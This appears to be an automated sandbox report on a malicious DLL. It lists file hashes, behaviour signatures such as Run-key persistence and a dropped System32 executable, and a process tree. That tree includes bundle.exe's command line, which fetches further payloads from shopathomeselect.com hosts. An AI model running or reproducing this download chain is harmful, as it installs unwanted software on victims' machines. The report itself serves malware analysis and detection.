Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19-03-2024 08:39

General

  • Target
    d5ae71e6109ad99590a2b3ec2d2f55d7.dll
  • Size
    96KB
  • MD5
    d5ae71e6109ad99590a2b3ec2d2f55d7
  • SHA1
    5e1088bdcd5eca984f6546296aaae41b6180b66d
  • SHA256
    bb14e2647c19bc26b2cbaa537795aaa9cb0c3959cadfc6c78564d3603714cb86
  • SHA512
    394f03eb0ffd879d8d8fa56825b934e67e103d756ce0f71f08f7c9bd464a20e2dbc3681c9b050b229620245f3b4510fc2aeea6c31c958f282a5ebf04c362c5dc
  • SSDEEP
    1536:IflEc8naP2D22/muSD6d68BrJOx2LednhYxN0CcjwwDvx:I5g22/dBrJOMLkOf+N7x

Score
7/10

Signatures

  • Executes dropped EXE (2 IoCs)
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Drops file in System32 directory (1 IoC)
  • Modifies registry class (10 IoCs)
  • Suspicious use of WriteProcessMemory (9 IoCs)

Processes

  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\d5ae71e6109ad99590a2b3ec2d2f55d7.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\d5ae71e6109ad99590a2b3ec2d2f55d7.dll
      2⤵
      • Drops file in System32 directory
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3216
      • C:\Windows\SysWOW64\sahagent1003.exe
        "C:\Windows\System32\sahagent1003.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3120
        • C:\Users\Admin\AppData\Local\Temp\bundle.exe
          "C:\Users\Admin\AppData\Local\Temp\bundle.exe" download1.shopathomeselect.com/agent/mindset1003.sah#bunSetup.cab#download1.shopathomeselect.com/agent/bunSetup.cab#www.shopathomeselect.com/agent/agentprefs.sah
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          PID:4772
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3476 --field-trial-handle=2260,i,3303482231723870786,2954015409682154873,262144 --variations-seed-version /prefetch:8
    1⤵
    PID:5056

Downloads

  • C:\Users\Admin\AppData\Local\Temp\bundle.exe
    Filesize
    76KB
    MD5
    12b77b012ec72a0dfdc311b0f46de641
    SHA1
    52efa989341f778626da592915048a280c1a305f
    SHA256
    ab995fdb0470311ffb79b1163e78ad4506fe89881c3fc92994bfc99b2e2351fa
    SHA512
    9f2cf0e249e1f35aea96e23e5c5f66ef83b321f0519fa0d6a5e73e25ca6977bd4ae3fd9baceba3237b602335a422b96af6e00cabf17a7ba0f7f50dd99b782a1a
  • C:\Windows\SysWOW64\sahagent1003.exe
    Filesize
    72KB
    MD5
    82344899bc34ce448a909f5bb7c56e5c
    SHA1
    52ec80cdd38415c5d67afee75c46ef3523fb4ceb
    SHA256
    e12d3e05d4c5f68b1a116c60e6f4c1b3235fdb1a7171e44c05847ccfe3972c44
    SHA512
    ef5be92a5e85951bb5a64f471d1c9fee1fb644a1716ab147356dd811e284f3567c7e0a7457de1290d0b9ad5ea594ca4c9d670abed4dd2e3e599bc4c5cd069e8b